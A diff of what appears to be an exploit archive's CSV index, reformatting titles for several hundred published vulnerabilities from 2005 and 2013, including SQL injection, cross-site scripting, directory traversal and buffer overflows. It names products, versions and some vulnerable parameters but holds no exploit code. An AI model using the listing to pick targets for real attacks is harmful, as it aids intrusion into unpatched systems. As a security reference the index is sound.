-25133,platforms/multiple/remote/25133.txt,"xinkaa web station 1.0.3 - Directory Traversal vulnerability",2005-02-21,"Luigi Auriemma",multiple,remote,0 +25133,platforms/multiple/remote/25133.txt,"xinkaa web station 1.0.3 - Directory Traversal Vulnerability",2005-02-21,"Luigi Auriemma",multiple,remote,0 25134,platforms/linux/local/25134.c,"sudo 1.8.0-1.8.3p1 (sudo_debug) - Root Exploit + glibc FORTIFY_SOURCE Bypass",2013-05-01,aeon,linux,local,0 25135,platforms/windows/dos/25135.txt,"Syslog Watcher Pro 2.8.0.812 - (Date Parameter) - Cross Site Scripting Vulnerability",2013-05-01,demonalex,windows,dos,0 25136,platforms/php/remote/25136.rb,"phpMyAdmin Authenticated Remote Code Execution via preg_replace()",2013-05-01,metasploit,php,remote,0 @@ -22245,12 +22245,12 @@ id,file,description,date,author,platform,type,port 25141,platforms/windows/local/25141.rb,"AudioCoder 0.8.18 - Buffer Overflow Exploit (SEH)",2013-05-02,metacom,windows,local,0 25142,platforms/hardware/webapps/25142.txt,"D-Link DNS-323 - Multiple Vulnerabilities",2013-05-02,sghctoma,hardware,webapps,0 25143,platforms/php/webapps/25143.txt,"Invision Power Board 1.x/2.0.3 SML Code Script Injection Vulnerability",2005-02-21,"Daniel A.",php,webapps,0 -25144,platforms/windows/remote/25144.txt,"sd server 4.0.70 - Directory Traversal vulnerability",2005-02-21,CorryL,windows,remote,0 +25144,platforms/windows/remote/25144.txt,"sd server 4.0.70 - Directory Traversal Vulnerability",2005-02-21,CorryL,windows,remote,0 25145,platforms/php/webapps/25145.txt,"PANews 2.0 - Remote PHP Script Code Execution Vulnerability",2005-02-21,tjomka,php,webapps,0 25146,platforms/windows/remote/25146.txt,"OpenConnect WebConnect 6.4/6.5 jretest.html Traversal Arbitrary File Access",2005-02-21,"Dennis Rand",windows,remote,0 25147,platforms/cgi/webapps/25147.txt,"Biz Mail Form 2.x Unauthorized Mail Relay Vulnerability",2005-02-22,"Jason Frisvold",cgi,webapps,0 25148,platforms/asp/webapps/25148.txt,"Mono 1.0.5 - Unicode Character Conversion Multiple Cross-Site Scripting Vulnerabilities",2005-02-22,"Andrey Rusyaev",asp,webapps,0 -25149,platforms/php/webapps/25149.txt,"iGeneric iG Shop 1.x Multiple SQL Injection Vulnerabilities",2005-02-22,"John Cobb",php,webapps,0 +25149,platforms/php/webapps/25149.txt,"iGeneric iG Shop 1.x - Multiple SQL Injection Vulnerabilities",2005-02-22,"John Cobb",php,webapps,0 25150,platforms/linux/remote/25150.txt,"Winace UnAce 1.x ACE Archive Remote Directory Traversal Vulnerability",2005-02-23,"Ulf Harnhammar",linux,remote,0 25151,platforms/php/webapps/25151.txt,"PBLang Bulletin Board System 4.6 Search.PHP Cross-Site Scripting Vulnerability",2005-02-23,"Hackerlounge Research Group",php,webapps,0 25152,platforms/php/webapps/25152.txt,"phpMyAdmin 2.6 select_server.lib.php Multiple Parameter XSS",2005-02-24,"Maksymilian Arciemowicz",php,webapps,0 @@ -22263,10 +22263,10 @@ id,file,description,date,author,platform,type,port 25159,platforms/jsp/webapps/25159.txt,"cyclades alterpath manager 1.1 - Multiple Vulnerabilities",2005-02-24,sullo@cirt.net,jsp,webapps,0 25160,platforms/php/webapps/25160.txt,"PunBB 3.0/3.1 - Multiple Remote Input Validation Vulnerabilities",2005-02-24,"John Gumbel",php,webapps,0 25161,platforms/php/webapps/25161.txt,"PHPWebSite 0.x Image File Processing Remote Arbitrary PHP File Upload Vulnerability",2005-02-24,tjomka,php,webapps,0 -25162,platforms/php/webapps/25162.txt,"CubeCart 2.0.x Multiple Cross-Site Scripting Vulnerabilities",2005-02-25,Lostmon,php,webapps,0 -25163,platforms/windows/remote/25163.txt,"CIS WebServer 3.5.13 Remote Directory Traversal Vulnerability",2005-02-25,CorryL,windows,remote,0 +25162,platforms/php/webapps/25162.txt,"CubeCart 2.0.x - Multiple Cross-Site Scripting Vulnerabilities",2005-02-25,Lostmon,php,webapps,0 +25163,platforms/windows/remote/25163.txt,"CIS WebServer 3.5.13 - Remote Directory Traversal Vulnerability",2005-02-25,CorryL,windows,remote,0 25164,platforms/linux/dos/25164.txt,"Gaim 1.1.3 File Download Denial of Service Vulnerability",2005-02-25,"Randall Perry",linux,dos,0 -25165,platforms/multiple/dos/25165.c,"Stormy Studios KNet 1.x Remote Buffer Overflow Vulnerability",2005-02-26,Expanders,multiple,dos,0 +25165,platforms/multiple/dos/25165.c,"Stormy Studios KNet 1.x - Remote Buffer Overflow Vulnerability",2005-02-26,Expanders,multiple,dos,0 25166,platforms/windows/remote/25166.c,"Working Resources BadBlue 2.55 MFCISAPICommand Remote Buffer Overflow Vulnerability (1)",2004-12-26,"Miguel Tarasc",windows,remote,0 25167,platforms/windows/remote/25167.c,"Working Resources BadBlue 2.55 MFCISAPICommand Remote Buffer Overflow Vulnerability (2)",2005-02-27,class101,windows,remote,0 25168,platforms/php/webapps/25168.c,"PHPBB 2.0.x Authentication Bypass Vulnerability (1)",2005-02-28,Paisterist,php,webapps,0 @@ -22279,7 +22279,7 @@ id,file,description,date,author,platform,type,port 25175,platforms/php/webapps/25175.txt,"phpCOIN 1.2 login.php Multiple Parameter XSS",2005-03-01,Lostmon,php,webapps,0 25176,platforms/php/webapps/25176.txt,"PBLang Bulletin Board System 4.x SendPM.PHP Directory Traversal Vulnerability",2005-03-01,Raven,php,webapps,0 25177,platforms/php/webapps/25177.txt,"CutePHP CuteNews 1.3.6 X-Forwarded-For Script Injection Vulnerability",2005-03-01,FraMe,php,webapps,0 -25178,platforms/php/webapps/25178.txt,"427BB 2.x Multiple Remote HTML Injection Vulnerabilities",2005-03-01,"Hackerlounge Research Group",php,webapps,0 +25178,platforms/php/webapps/25178.txt,"427BB 2.x - Multiple Remote HTML Injection Vulnerabilities",2005-03-01,"Hackerlounge Research Group",php,webapps,0 25179,platforms/php/webapps/25179.txt,"PBLang Bulletin Board System 4.x DelPM.PHP Arbitrary Personal Message Deletion Vulnerability",2005-03-01,Raven,php,webapps,0 25180,platforms/php/webapps/25180.py,"PHPNews 1.2.3/1.2.4 Auth.PHP Remote File Include Vulnerability",2005-03-01,mozako,php,webapps,0 25181,platforms/windows/remote/25181.py,"Cerulean Studios Trillian 3.0 - Remote PNG Image File Parsing Buffer Overflow Vulnerability",2005-03-02,"Tal Zeltzer",windows,remote,0 @@ -22288,7 +22288,7 @@ id,file,description,date,author,platform,type,port 25184,platforms/php/webapps/25184.txt,"ProjectBB 0.4.5 .1 - Multiple SQL Injection Vulnerabilities",2005-03-02,"benji lemien",php,webapps,0 25185,platforms/php/webapps/25185.txt,"D-Forum 1.11 Nav.PHP3 Cross-Site Scripting Vulnerability",2005-03-03,benjilenoob,php,webapps,0 25186,platforms/php/webapps/25186.txt,"Typo3 CMW_Linklist 1.4.1 Extension SQL Injection Vulnerability",2005-03-03,"Fabian Becker",php,webapps,0 -25187,platforms/windows/remote/25187.txt,"Computalynx CProxy 3.3/3.4.x Directory Traversal Vulnerability",2005-03-03,"Kristof Philipsen",windows,remote,0 +25187,platforms/windows/remote/25187.txt,"Computalynx CProxy 3.3/3.4.x - Directory Traversal Vulnerability",2005-03-03,"Kristof Philipsen",windows,remote,0 25188,platforms/windows/remote/25188.txt,"Opera 7.x, Firefox 1.0, Internet Explorer 6.0 Information Disclosure Weakness",2005-02-19,upken,windows,remote,0 25189,platforms/php/webapps/25189.txt,"Stadtaus.Com Download Center Lite 1.5 Arbitrary Remote PHP File Include Vulnerability",2005-03-04,"Filip Groszynski",php,webapps,0 25190,platforms/multiple/remote/25190.txt,"ca3de Multiple Vulnerabilities",2005-03-03,"Luigi Auriemma",multiple,remote,0 @@ -22299,7 +22299,7 @@ id,file,description,date,author,platform,type,port 25195,platforms/windows/remote/25195.txt,"Oracle Database 8i/9i Multiple Remote Directory Traversal Vulnerabilities",2005-03-07,"Cesar Cerrudo",windows,remote,0 25196,platforms/windows/remote/25196.txt,"Yahoo! Messenger 5.x/6.0 Offline Mode Status Remote Buffer Overflow Vulnerability",2005-03-08,"Mehrtash Mallahzadeh",windows,remote,0 25197,platforms/php/webapps/25197.txt,"PHP-Fusion 5.0 BBCode IMG Tag Script Injection Vulnerability",2005-03-08,FireSt0rm,php,webapps,0 -25198,platforms/jsp/webapps/25198.txt,"OutStart Participate Enterprise 3 Multiple Access Validation Vulnerabilities",2005-03-08,Altrus,jsp,webapps,0 +25198,platforms/jsp/webapps/25198.txt,"OutStart Participate Enterprise 3 - Multiple Access Validation Vulnerabilities",2005-03-08,Altrus,jsp,webapps,0 25199,platforms/php/webapps/25199.txt,"YaBB 2.0 - Remote UsersRecentPosts Cross-Site Scripting Vulnerability",2005-03-08,trueend5,php,webapps,0 25200,platforms/php/webapps/25200.txt,"PHP Arena PAFileDB 3.1 - Multiple Remote Cross Site Scripting Vulnerabilities",2005-03-08,sp3x@securityreason.com,php,webapps,0 25201,platforms/cgi/webapps/25201.txt,"NewsScript Access Validation Vulnerability",2005-03-08,adrianc23@gmail.com,cgi,webapps,0 @@ -22319,12 +22319,12 @@ id,file,description,date,author,platform,type,port 25215,platforms/php/webapps/25215.txt,"PAFileDB 1.1.3/2.1.1/3.0/3.1 viewall.php start Parameter XSS",2005-03-12,sp3x@securityreason.com,php,webapps,0 25216,platforms/php/webapps/25216.txt,"PAFileDB 1.1.3/2.1.1/3.0/3.1 category.php start Parameter XSS",2005-03-12,sp3x@securityreason.com,php,webapps,0 25217,platforms/php/webapps/25217.html,"HolaCMS 1.2/1.4.x Voting Module Remote File Corruption Vulnerability",2005-03-12,"Virginity Security",php,webapps,0 -25218,platforms/windows/dos/25218.pl,"PlatinumFTPServer 1.0.18 Multiple Malformed User Name Connection Denial of Service Vulnerability",2005-03-05,ports,windows,dos,0 +25218,platforms/windows/dos/25218.pl,"PlatinumFTPServer 1.0.18 - Multiple Malformed User Name Connection Denial of Service Vulnerability",2005-03-05,ports,windows,dos,0 25219,platforms/windows/dos/25219.txt,"Spinworks Application Server 3.0 - Remote Denial of Service Vulnerability",2005-03-15,dr_insane,windows,dos,0 25220,platforms/php/webapps/25220.txt,"PABox 2.0 Post Icon HTML Injection Vulnerability",2005-03-14,Rift_XT,php,webapps,0 25221,platforms/linux/remote/25221.txt,"Mozilla Suite/Firefox/Thunderbird Nested Anchor Tag Status Bar Spoofing Weakness",2005-03-14,"bitlance winter",linux,remote,0 25222,platforms/php/webapps/25222.html,"HolaCMS 1.2.x/1.4.x Voting Module Directory Traversal Remote File Corruption Vulnerability",2005-03-13,"Virginity Security",php,webapps,0 -25223,platforms/php/webapps/25223.txt,"Phorum 5.0.14 Multiple Subject and Attachment HTML Injection Vulnerabilities",2005-03-14,"Jon Oberheide",php,webapps,0 +25223,platforms/php/webapps/25223.txt,"Phorum 5.0.14 - Multiple Subject and Attachment HTML Injection Vulnerabilities",2005-03-14,"Jon Oberheide",php,webapps,0 25224,platforms/php/webapps/25224.txt,"SimpGB 1.0 Guestbook.PHP SQL Injection Vulnerability",2005-03-14,visus,php,webapps,0 25225,platforms/php/webapps/25225.txt,"PHPAdsNew 2.0.4 AdFrame.PHP Cross-Site Scripting Vulnerability",2005-03-14,"Maksymilian Arciemowicz",php,webapps,0 25226,platforms/php/webapps/25226.txt,"VoteBox 2.0 Votebox.PHP Remote File Include Vulnerability",2005-03-14,SmOk3,php,webapps,0 @@ -22335,7 +22335,7 @@ id,file,description,date,author,platform,type,port 25231,platforms/windows/dos/25231.txt,"Microsoft Windows 2000/2003/XP Graphical Device Interface Library Denial of Service Vulnerability",2005-03-17,"Hongzhen Zhou",windows,dos,0 25232,platforms/php/webapps/25232.txt,"McNews 1.x Install.PHP Arbitrary File Include Vulnerability",2005-03-17,"Jonathan Whiteley",php,webapps,0 25233,platforms/asp/webapps/25233.txt,"ACS Blog 0.8/0.9/1.0/1.1 Search.ASP Cross-Site Scripting Vulnerability",2005-03-17,"farhad koosha",asp,webapps,0 -25234,platforms/linux/local/25234.sh,"Linux Kernel 2.4.x/2.6.x Multiple Unspecified ISO9660 Filesystem Handling Vulnerabilities",2005-03-17,"Michal Zalewski",linux,local,0 +25234,platforms/linux/local/25234.sh,"Linux Kernel 2.4.x/2.6.x - Multiple Unspecified ISO9660 Filesystem Handling Vulnerabilities",2005-03-17,"Michal Zalewski",linux,local,0 25235,platforms/php/webapps/25235.txt,"Subdreamer 1.0 - SQL Injection Vulnerability",2005-03-18,"GHC team",php,webapps,0 25236,platforms/php/webapps/25236.html,"PHPOpenChat 3.0.1 - Multiple HTML Injection Vulnerabilities",2005-03-18,"PersianHacker Team",php,webapps,0 25237,platforms/php/webapps/25237.txt,"RunCMS 1.1 Database Configuration Information Disclosure Vulnerability",2005-03-18,"Majid NT",php,webapps,0 @@ -22356,7 +22356,7 @@ id,file,description,date,author,platform,type,port 25253,platforms/asp/webapps/25253.txt,"betaparticle blog 2.0/3.0 upload.asp Unauthenticated File Upload",2005-03-21,"farhad koosha",asp,webapps,0 25254,platforms/asp/webapps/25254.txt,"betaparticle blog 2.0/3.0 myFiles.asp Unauthenticated File Manipulation",2005-03-21,"farhad koosha",asp,webapps,0 25255,platforms/windows/dos/25255.txt,"FUN labs Game Engine Multiple Remote Denial of Service Vulnerabilities",2005-03-20,"Luigi Auriemma",windows,dos,0 -25256,platforms/osx/local/25256.c,"Apple Mac OS X 10.3.x Multiple Vulnerabilities",2005-03-21,V9,osx,local,0 +25256,platforms/osx/local/25256.c,"Apple Mac OS X 10.3.x - Multiple Vulnerabilities",2005-03-21,V9,osx,local,0 25257,platforms/php/webapps/25257.txt,"Kayako ESupport 2.3 Index.PHP Multiple Parameter Cross-Site Scripting Vulnerability",2005-03-22,"James Bercegay",php,webapps,0 25258,platforms/php/webapps/25258.txt,"Phorum 3.x/5.0.x HTTP Response Splitting Vulnerability",2005-03-22,"Alexander Anisimov",php,webapps,0 25259,platforms/windows/dos/25259.py,"Microsoft Windows XP Local Denial of Service Vulnerability",2005-03-22,liquid@cyberspace.org,windows,dos,0 @@ -22375,7 +22375,7 @@ id,file,description,date,author,platform,type,port 25272,platforms/php/webapps/25272.txt,"Dream4 Koobi CMS 4.2.3 Index.PHP Cross-Site Scripting Vulnerability",2005-03-24,mircia,php,webapps,0 25273,platforms/php/webapps/25273.txt,"Dream4 Koobi CMS 4.2.3 Index.PHP SQL Injection Vulnerability",2005-03-24,mircia,php,webapps,0 25274,platforms/windows/remote/25274.html,"Maxthon Web Browser 1.2 Search Bar Information Disclosure Vulnerability",2005-03-25,"Aviv Raff",windows,remote,0 -25275,platforms/linux/remote/25275.c,"Smail-3 Multiple Remote and Local Vulnerabilities",2005-03-25,infamous42md,linux,remote,0 +25275,platforms/linux/remote/25275.c,"Smail-3 - Multiple Remote and Local Vulnerabilities",2005-03-25,infamous42md,linux,remote,0 25276,platforms/php/webapps/25276.txt,"PHPMyDirectory 10.1.3 Review.PHP Multiple Parameter Cross-Site Scripting Vulnerability",2005-03-25,mircia,php,webapps,0 25277,platforms/hardware/dos/25277.txt,"Netcomm NB1300 Modem/Router Remote Denial of Service Vulnerability",2005-03-25,"Chris Rock",hardware,dos,0 25278,platforms/php/webapps/25278.sh,"ESMI PayPal Storefront 1.7 pages.php idpages Parameter SQL Injection",2005-03-26,Dcrab,php,webapps,0 @@ -22414,7 +22414,7 @@ id,file,description,date,author,platform,type,port 25314,platforms/php/webapps/25314.txt,"The Includer 1.0/1.1 - Remote File Include Vulnerability",2005-03-29,"hoang yen",php,webapps,0 25315,platforms/php/webapps/25315.html,"Chatness 2.5 Message Form Field HTML Injection Vulnerability",2005-03-29,3nitro,php,webapps,0 25316,platforms/php/webapps/25316.txt,"CPG Dragonfly 9.0.2 .0 - Multiple Cross-Site Scripting Vulnerabilities",2005-03-29,mircia,php,webapps,0 -25317,platforms/php/webapps/25317.txt,"Uapplication Ublog 1.0.x Cross-Site Scripting Vulnerability",2005-03-29,"PersianHacker Team",php,webapps,0 +25317,platforms/php/webapps/25317.txt,"Uapplication Ublog 1.0.x - Cross-Site Scripting Vulnerability",2005-03-29,"PersianHacker Team",php,webapps,0 25318,platforms/asp/webapps/25318.txt,"Iatek IntranetApp 2.3 ad_click.asp banner_id Parameter SQL Injection",2005-03-29,"Diabolic Crab",asp,webapps,0 25319,platforms/windows/remote/25319.txt,"FastStone 4in1 Browser 1.2 Web Server Remote Directory Traversal Vulnerability",2005-03-29,"Donato Ferrante",windows,remote,0 25320,platforms/php/webapps/25320.txt,"Lighthouse Development Squirrelcart 1.5.5 - SQL Injection Vulnerability",2005-03-29,"Diabolic Crab",php,webapps,0 @@ -22435,7 +22435,7 @@ id,file,description,date,author,platform,type,port 25335,platforms/unix/remote/25335.txt,"IBM iSeries AS400 LDAP Server Remote Information Disclosure Vulnerability",2005-04-04,"Shalom Carmel",unix,remote,0 25336,platforms/windows/remote/25336.txt,"Logics Software LOG-FT Arbitrary File Disclosure Vulnerability",2005-04-05,"Pedro Viuales and Rom Ramirez",windows,remote,0 25337,platforms/php/webapps/25337.txt,"ProfitCode Software PayProCart 3.0 Usrdetails.PHP Cross-Site Scripting Vulnerability",2005-04-05,"Diabolic Crab",php,webapps,0 -25338,platforms/php/webapps/25338.txt,"profitcode software payprocart 3.0 - Directory Traversal vulnerability",2005-04-05,"Diabolic Crab",php,webapps,0 +25338,platforms/php/webapps/25338.txt,"profitcode software payprocart 3.0 - Directory Traversal Vulnerability",2005-04-05,"Diabolic Crab",php,webapps,0 25339,platforms/php/webapps/25339.txt,"PHP-Nuke 6.x/7.x Your_Account Module Username Cross-Site Scripting Vulnerability",2005-04-05,sp3x@securityreason.com,php,webapps,0 25340,platforms/php/webapps/25340.txt,"PHP-Nuke 6.x/7.x Your_Account Module Avatarcategory Cross-Site Scripting Vulnerability",2005-04-05,sp3x@securityreason.com,php,webapps,0 25341,platforms/php/webapps/25341.html,"PHP-Nuke 6.x/7.x Downloads Module Lid Parameter Cross-Site Scripting Vulnerability",2005-04-05,sp3x@securityreason.com,php,webapps,0 @@ -22460,7 +22460,7 @@ id,file,description,date,author,platform,type,port 25360,platforms/php/webapps/25360.txt,"PHP-Nuke 7.6 Web_Links Module Multiple SQL Injection Vulnerabilities",2005-04-07,"Maksymilian Arciemowicz",php,webapps,0 25361,platforms/irix/local/25361.txt,"SGI IRIX 6.5.22 GR_OSView Information Disclosure Vulnerability",2005-04-07,anonymous,irix,local,0 25362,platforms/irix/local/25362.txt,"SGI IRIX 6.5.22 GR_OSView Local Arbitrary File Overwrite Vulnerability",2005-04-07,anonymous,irix,local,0 -25363,platforms/windows/dos/25363.py,"Lan Messenger sending PM Buffer Overflow(UNICODE) - Overwrite SEH",2013-05-11,ariarat,windows,dos,0 +25363,platforms/windows/dos/25363.py,"Lan Messenger sending PM Buffer Overflow (UNICODE) - Overwrite SEH",2013-05-11,ariarat,windows,dos,0 25364,platforms/windows/dos/25364.txt,"AN HTTPD CMDIS.DLL Remote Buffer Overflow Vulnerability",2005-04-08,"Tan Chew Keong",windows,dos,0 25365,platforms/windows/remote/25365.txt,"AN HTTPD 1.42 Arbitrary Log Content Injection Vulnerability",2005-04-08,"Tan Chew Keong",windows,remote,0 25366,platforms/php/webapps/25366.txt,"PostNuke Phoenix 0.760 RC3 OP Parameter Remote Cross-Site Scripting Vulnerability",2005-04-08,Dcrab,php,webapps,0 @@ -22538,7 +22538,7 @@ id,file,description,date,author,platform,type,port 25439,platforms/multiple/dos/25439.c,"Multiple Vendor TCP Session Acknowledgement Number Denial of Service Vulnerability",2004-12-13,"Antonio M. D. S. Fortes",multiple,dos,0 25440,platforms/php/webapps/25440.txt,"Wordpress wp-FileManager - Arbitrary File Download Vulnerability",2013-05-14,ByEge,php,webapps,0 25441,platforms/php/webapps/25441.txt,"IPB (Invision Power Board) all versions (1.x? / 2.x / 3.x) - Admin Account Takeover",2013-05-14,"John JEAN",php,webapps,0 -25442,platforms/php/webapps/25442.txt,"WHMCS 4.x (invoicefunctions.php, id param) - SQL Injection Vulnerability",2013-05-14,"Ahmed Aboul-Ela",php,webapps,0 +25442,platforms/php/webapps/25442.txt,"WHMCS 4.x - (invoicefunctions.php, id param) - SQL Injection Vulnerability",2013-05-14,"Ahmed Aboul-Ela",php,webapps,0 25443,platforms/windows/dos/25443.txt,"Quick Search 1.1.0.189 - Buffer Overflow Vulnerability (SEH)",2013-05-14,ariarat,windows,dos,0 25444,platforms/linux/local/25444.c,"Linux Kernel 2.6.37 <= 3.x.x - PERF_EVENTS Local Root Exploit",2013-05-14,sd,linux,local,0 25445,platforms/multiple/remote/25445.rb,"SAP SOAP RFC SXPG_CALL_SYSTEM Remote Command Execution",2013-05-14,metasploit,multiple,remote,8000 @@ -22582,7 +22582,7 @@ id,file,description,date,author,platform,type,port 25484,platforms/asp/webapps/25484.txt,"DUportal 3.1.2 inc_rating.asp Multiple Parameter SQL Injection",2005-04-20,Dcrab,asp,webapps,0 25485,platforms/asp/webapps/25485.txt,"DUportal 3.1.2 type.asp iCat Parameter SQL Injection",2005-04-20,Dcrab,asp,webapps,0 25486,platforms/windows/remote/25486.txt,"RaidenFTPD 2.4 Unauthorized File Access Vulnerability",2005-04-21,"Lachlan. H",windows,remote,0 -25487,platforms/windows/remote/25487.txt,"yawcam 0.2.5 - Directory Traversal vulnerability",2005-04-21,"Donato Ferrante",windows,remote,0 +25487,platforms/windows/remote/25487.txt,"yawcam 0.2.5 - Directory Traversal Vulnerability",2005-04-21,"Donato Ferrante",windows,remote,0 25488,platforms/php/webapps/25488.txt,"ProfitCode Software PayProCart 3.0 Username Cross-Site Scripting Vulnerability",2005-04-21,Lostmon,php,webapps,0 25489,platforms/php/webapps/25489.txt,"ProfitCode Software PayProCart 3.0 Ckprvd Cross-Site Scripting Vulnerability",2005-04-21,Lostmon,php,webapps,0 25490,platforms/php/webapps/25490.txt,"ProfitCode Software PayProCart 3.0 AdminShop HDoc Cross-Site Scripting Vulnerability",2005-04-21,Lostmon,php,webapps,0 @@ -22666,7 +22666,7 @@ id,file,description,date,author,platform,type,port 25568,platforms/php/webapps/25568.txt,"phpCOIN 1.2 login.php phpcoinsessid Parameter SQL Injection",2005-04-28,Dcrab,php,webapps,0 25569,platforms/php/webapps/25569.txt,"phpCOIN 1.2 Pages Module Multiple Parameter SQL Injection",2005-04-28,Dcrab,php,webapps,0 25570,platforms/php/webapps/25570.txt,"JGS-Portal 3.0.1 ID Variable SQL Injection Vulnerability",2005-04-30,admin@batznet.com,php,webapps,0 -25571,platforms/windows/remote/25571.txt,"video cam server 1.0 - Directory Traversal vulnerability",2005-05-02,"Donato Ferrante",windows,remote,0 +25571,platforms/windows/remote/25571.txt,"video cam server 1.0 - Directory Traversal Vulnerability",2005-05-02,"Donato Ferrante",windows,remote,0 25572,platforms/windows/remote/25572.txt,"Video Cam Server 1.0 Path Disclosure Vulnerability",2005-05-02,"Donato Ferrante",windows,remote,0 25573,platforms/windows/remote/25573.txt,"Video Cam Server 1.0 Administrative Interface Authentication Bypass Vulnerability",2005-05-02,"Donato Ferrante",windows,remote,0 25574,platforms/multiple/remote/25574.txt,"Mtp-Target 1.2.2 Client Remote Format String Vulnerability",2005-05-02,"Luigi Auriemma",multiple,remote,0 @@ -22691,8 +22691,8 @@ id,file,description,date,author,platform,type,port 25596,platforms/asp/webapps/25596.txt,"ASP Inline Corporate Calendar 3.6.3 Details.ASP SQL Injection Vulnerability",2005-05-04,Zinho,asp,webapps,0 25597,platforms/windows/remote/25597.txt,"Adobe SVG Viewer 3.0 ActiveX Control SRC Information Disclosure Vulnerability",2005-05-04,"Robert Fly",windows,remote,0 25598,platforms/osx/remote/25598.txt,"Apple Mac OS X 10.x BlueTooth Directory Traversal Vulnerability",2005-05-04,"Kevin Finisterre",osx,remote,0 -25599,platforms/php/webapps/25599.txt,"interspire articlelive 2005 Multiple Vulnerabilities",2005-05-04,Dcrab,php,webapps,0 -25600,platforms/windows/remote/25600.txt,"simplecam 1.2 - Directory Traversal vulnerability",2005-05-04,"Donato Ferrante",windows,remote,0 +25599,platforms/php/webapps/25599.txt,"interspire articlelive 2005 - Multiple Vulnerabilities",2005-05-04,Dcrab,php,webapps,0 +25600,platforms/windows/remote/25600.txt,"simplecam 1.2 - Directory Traversal Vulnerability",2005-05-04,"Donato Ferrante",windows,remote,0 25601,platforms/php/webapps/25601.txt,"FishCart 3.1 display.php nlst Parameter XSS",2005-05-04,Dcrab,php,webapps,0 25602,platforms/php/webapps/25602.txt,"FishCart 3.1 upstracking.php Multiple Parameter XSS",2005-05-04,Dcrab,php,webapps,0 25603,platforms/php/webapps/25603.txt,"FishCart 3.1 display.php psku Parameter SQL Injection",2005-05-04,Dcrab,php,webapps,0 @@ -22712,7 +22712,7 @@ id,file,description,date,author,platform,type,port 25618,platforms/php/webapps/25618.txt,"MidiCart PHP Search_List.PHP SearchString Parameter Cross-Site Scripting Vulnerability",2005-05-05,Exoduks,php,webapps,0 25619,platforms/php/webapps/25619.txt,"MidiCart PHP Item_List.PHP SecondGroup Parameter Cross-Site Scripting Vulnerability",2005-05-05,Exoduks,php,webapps,0 25620,platforms/php/webapps/25620.txt,"MidiCart PHP Item_List.PHP Maingroup Parameter Cross-Site Scripting Vulnerability",2005-05-05,Exoduks,php,webapps,0 -25621,platforms/windows/remote/25621.txt,"software602 602 lan suite 2004 - Directory Traversal vulnerability",2005-05-05,dr_insane,windows,remote,0 +25621,platforms/windows/remote/25621.txt,"software602 602 lan suite 2004 - Directory Traversal Vulnerability",2005-05-05,dr_insane,windows,remote,0 25622,platforms/cgi/webapps/25622.txt,"MegaBook 2.0/2.1 Admin.CGI EntryID Cross-Site Scripting Vulnerability",2005-05-05,"Spy Hat",cgi,webapps,0 25623,platforms/php/webapps/25623.txt,"CJ Ultra Plus 1.0.3/1.0.4 OUT.PHP SQL Injection Vulnerability",2005-05-06,Kold,php,webapps,0 25624,platforms/unix/remote/25624.c,"Apache 1.3.x HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (1)",2005-05-06,"Luca Ercoli",unix,remote,0 @@ -22760,7 +22760,7 @@ id,file,description,date,author,platform,type,port 25666,platforms/cgi/webapps/25666.txt,"PServ 3.2 - Remote Source Code Disclosure Vulnerability",2005-05-16,"Claus R. F. Overbeck",cgi,webapps,0 25667,platforms/asp/webapps/25667.txt,"MetaCart E-Shop ProductsByCategory.ASP Cross-Site Scripting Vulnerability",2005-05-16,"Dedi Dwianto",asp,webapps,0 25668,platforms/cgi/webapps/25668.txt,"Sigma ISP Manager 6.6 Sigmaweb.DLL SQL Injection Vulnerability",2005-05-16,"mehran gashtasebi",cgi,webapps,0 -25669,platforms/linux/remote/25669.txt,"pserv 3.2 - Directory Traversal vulnerability",2005-05-16,"Claus R. F. Overbeck",linux,remote,0 +25669,platforms/linux/remote/25669.txt,"pserv 3.2 - Directory Traversal Vulnerability",2005-05-16,"Claus R. F. Overbeck",linux,remote,0 25670,platforms/multiple/remote/25670.html,"Mozilla Suite And Firefox DOM Property Overrides Code Execution Vulnerability",2005-05-16,moz_bug_r_a4,multiple,remote,0 25671,platforms/php/webapps/25671.txt,"NPDS 4.8/5.0 comments.php thold Parameter SQL Injection",2005-05-16,NoSP,php,webapps,0 25672,platforms/php/webapps/25672.txt,"NPDS 4.8/5.0 pollcomments.php thold Parameter SQL Injection",2005-05-16,NoSP,php,webapps,0 @@ -22774,7 +22774,7 @@ id,file,description,date,author,platform,type,port 25680,platforms/windows/dos/25680.txt,"War Times Remote Game Server Denial of Service Vulnerability",2005-05-17,"Luigi Auriemma",windows,dos,0 25681,platforms/php/webapps/25681.php,"FusionPHP Fusion News 3.3/3.6 X-ForwordedFor PHP Script Code Injection Vulnerability",2005-05-24,"Network security team",php,webapps,0 25682,platforms/php/webapps/25682.txt,"Wordpress 1.5 Post.PHP Cross-Site Scripting Vulnerability",2005-05-17,"Thomas Waldegger",php,webapps,0 -25683,platforms/php/webapps/25683.txt,"Help Center Live 1.0/1.2.x Multiple Input Validation Vulnerabilities",2005-05-24,"GulfTech Security",php,webapps,0 +25683,platforms/php/webapps/25683.txt,"Help Center Live 1.0/1.2.x - Multiple Input Validation Vulnerabilities",2005-05-24,"GulfTech Security",php,webapps,0 25684,platforms/hardware/remote/25684.html,"D-Link DSL Router Remote Authentication Bypass Vulnerability",2005-05-19,"Francesco Orro",hardware,remote,0 25685,platforms/jsp/webapps/25685.txt,"Sun JavaMail 1.3 API MimeMessage Infromation Disclosure Vulnerability",2005-05-19,"Ricky Latt",jsp,webapps,0 25686,platforms/php/webapps/25686.txt,"PHP Advanced Transfer Manager 1.21 Arbitrary File Include Vulnerability",2005-05-19,"Ingvar Gilbert",php,webapps,0 @@ -22782,9 +22782,9 @@ id,file,description,date,author,platform,type,port 25688,platforms/linux/local/25688.txt,"Gedit 2.x Filename Format String Vulnerability",2005-05-30,jsk:exworm,linux,local,0 25689,platforms/php/webapps/25689.txt,"EJ3 TOPo 2.2 - Multiple Index.PHP Cross-Site Scripting Vulnerabilities",2003-05-20,Lostmon,php,webapps,0 25690,platforms/php/webapps/25690.pl,"PortailPHP 1.3 ID Parameter SQL Injection Vulnerability",2005-05-23,"CENSORED Search Vulnerabilities",php,webapps,0 -25691,platforms/multiple/remote/25691.txt,"Warrior Kings 1.3 And Warrior Kings: Battles 1.23 Remote Format String Vulnerability",2005-05-23,"Luigi Auriemma",multiple,remote,0 -25692,platforms/multiple/remote/25692.txt,"Warrior Kings: Battles 1.23 Remote Denial of Service Vulnerability",2005-05-23,"Luigi Auriemma",multiple,remote,0 -25693,platforms/php/webapps/25693.txt,"GForge 3.x Remote Arbitrary Command Execution Vulnerability",2005-05-24,"Filippo Spike Morelli",php,webapps,0 +25691,platforms/multiple/remote/25691.txt,"Warrior Kings 1.3 And Warrior 